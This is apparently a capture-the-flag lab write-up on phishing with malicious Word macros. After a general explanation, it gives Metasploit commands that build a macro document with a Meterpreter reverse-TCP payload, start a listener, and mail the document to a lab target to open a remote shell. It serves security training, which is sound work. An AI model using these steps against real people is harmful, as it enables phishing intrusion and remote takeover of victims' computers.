Day 10: He had a brain full of macros, and had shells in his soul.

Note:

Hey! Before you go through this writeup try the task first by your self and if you get stuck come back and checkout the writeup.

Phishing is a deceptive cyberattack method where attackers impersonate trusted entities to trick individuals into revealing sensitive information, such as login credentials, financial details, or personal data. These attacks are typically carried out via emails, messages, or fake websites designed to appear legitimate. Phishing often exploits human psychology, using tactics like urgency, fear, or curiosity to prompt victims to act without caution. For example, an email might claim to be from a bank, urging the recipient to verify their account details to prevent deactivation. Once the victim provides the requested information, attackers can use it for fraud, identity theft, or unauthorised access. To combat phishing, users should verify the authenticity of requests, avoid clicking on suspicious links, and enable multi-factor authentication to secure accounts.

Office Word macros can be exploited in phishing attacks to deliver malicious payloads or execute harmful actions on a victim's system. Macros are small programs embedded within Office documents, designed to automate repetitive tasks. However, attackers can embed malicious scripts into these macros, enabling them to execute harmful code when the document is opened or macros are enabled.

For example, in a phishing attack, a victim might receive an email with an attached Word document claiming to be an invoice or an official notice. When the victim opens the document, it may prompt them to "Enable Macros" to view the content. If they comply, the malicious macro activates, potentially downloading malware, stealing sensitive information, or providing attackers with remote access to the victim's system. This technique is particularly dangerous because it exploits trust in familiar tools and relies on users enabling macros without realising the risks.

Office Word macros are automated sequences of commands or instructions written in the Visual Basic for Applications (VBA) programming language, designed to perform repetitive tasks in Microsoft Word. While macros can significantly improve productivity by automating complex processes, they can also be exploited for malicious purposes. Cybercriminals often embed harmful VBA code in Word documents to execute malicious actions, such as downloading malware, stealing sensitive information, or gaining unauthorised access to a system. These malicious macros are typically delivered through phishing emails with seemingly legitimate attachments, tricking users into enabling macros and triggering the attack.

Q: What is the flag value inside the flag.txt file that’s located on the Administrator’s desktop?

A: Following the steps in the challenge to create a word document with a TCP reverse shell macro in it, and email to marta@socmas.thm. Maybe renaming the word file would be a good idea to something like invoice.docm

To generate the malicious word file

msfconsole 
set payload windows/meterpreter/reverse_tcp
use exploit/multi/fileformat/office_word_macro
set LHOST <CONNECTION_IP>
set LPORT 8888
exploit

The <CONNECTION_IP> will be the IP of your attacker box.

The word doc will be located in,

/<username>/.msf4/local

Named msf.docm

Go back to the msf console and run the following commands to setup a listener to receive the TCP reverse shell connection.

use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST CONNECTION_IP
set LPORT 8888
exploit

The <CONNECTION_IP> will be the IP of your attacker box.

Open a web browser and visit the IP of the attack box and log in with credentials

• Email: info@socnas.thm
• Password: MerryPhishMas!

Send a email to marta@socmas.thm with the malicious macro attached to the email.

After about 2 minutes the TCP reverse shell listener should receive a connection.

Navigate to the Administrator Desktop and the flag should be there.

Happy Hacking!